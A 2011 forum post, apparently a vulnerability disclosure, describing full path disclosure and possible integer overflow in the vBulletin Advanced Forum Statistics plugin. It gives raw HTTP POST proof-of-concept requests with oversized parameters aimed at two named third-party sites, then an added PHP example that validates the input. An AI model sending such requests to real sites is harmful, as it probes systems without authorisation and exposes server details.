
02.11.2011, 21:39
Guest
Posts: n/a
Time on forum: 40748
Reputation: 78
[3.8.x] Cyb - Advanced Forum Statistics
[4.0.x] VSa - Advanced Forum Statistics
Starting with the 4.x line the name changed slightly: same tomato, different label.
FULL PATH DISCLOSURE
(path disclosure)
Possible integer overflow
3.8.X
Module cyb_topstats
PHP code:
$resultsnr_lp = ($resultsnr * 2) + 1;
4.0.X
Module vsa_topstats
PHP code:
$vsacb_resnr_lp = ($vsacb_resnr * 2) + 1;
PoC for 3.8.X:
Code:
POST /misc.php?do=cybstats HTTP/1.1
Host: brutezone.ru
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://brutezone.ru/misc.php?do=cybstats
Cookie: cookies. authorization is required.
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
securitytoken=1320250782-fda4c39ad1983a01f3b3ce9b94b7350c35099352&resultsnr=999999999999999999999999999999999999
PoC for 4.0.X:
(I have not tried it on 4.1.X.)
Code:
POST /misc.php?do=vsastats HTTP/1.1
Host: www.html.by
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://www.html.by/misc.php?do=vsastats
Cookie: cookies. authorization is required.
Content-Type: application/x-www-form-urlencoded
Content-Length: 124
securitytoken=1320251249-9e5b6a09879833baf7af3e58fae882855e302814&vsacb_resnr=5999999999999999999999999999999999999999999999
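An added example, not code from the post or from the plugin: validating the count parameter before the arithmetic quoted above, and keeping PHP error output (which carries absolute file paths) out of the response. The helper names, the default of 5 and the upper bound of 50 are assumptions.

```php
<?php
// Added example: hypothetical helpers, not code from the plugin or the post.
// Assumptions: default of 5, upper bound of 50, errors logged rather than shown.

// Keep PHP warnings (which include absolute file paths) out of the response.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

/**
 * Return the requested result count as a bounded integer.
 * FILTER_VALIDATE_INT rejects non-digit input and digit strings too large
 * for a PHP integer, so they fall back to the default before any arithmetic.
 */
function safe_results_count($raw, int $default = 5, int $max = 50): int
{
    $n = filter_var($raw, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1, 'max_range' => $max],
    ]);
    return $n === false ? $default : $n;
}

/** Same arithmetic as the plugin line quoted above, on a validated value. */
function results_loop_bound(int $count): int
{
    return ($count * 2) + 1;
}

// Constructed sample inputs, including an oversized digit string.
$samples = ['10', str_repeat('9', 36), '-1', 'abc', ['x']];

foreach ($samples as $raw) {
    $count = safe_results_count($raw);
    printf("%-40s -> count=%d bound=%d\n",
        is_array($raw) ? '(array)' : $raw, $count, results_loop_bound($count));
}

// Without validation the oversized string silently becomes a float.
var_dump(is_float((str_repeat('9', 36) * 2) + 1));
```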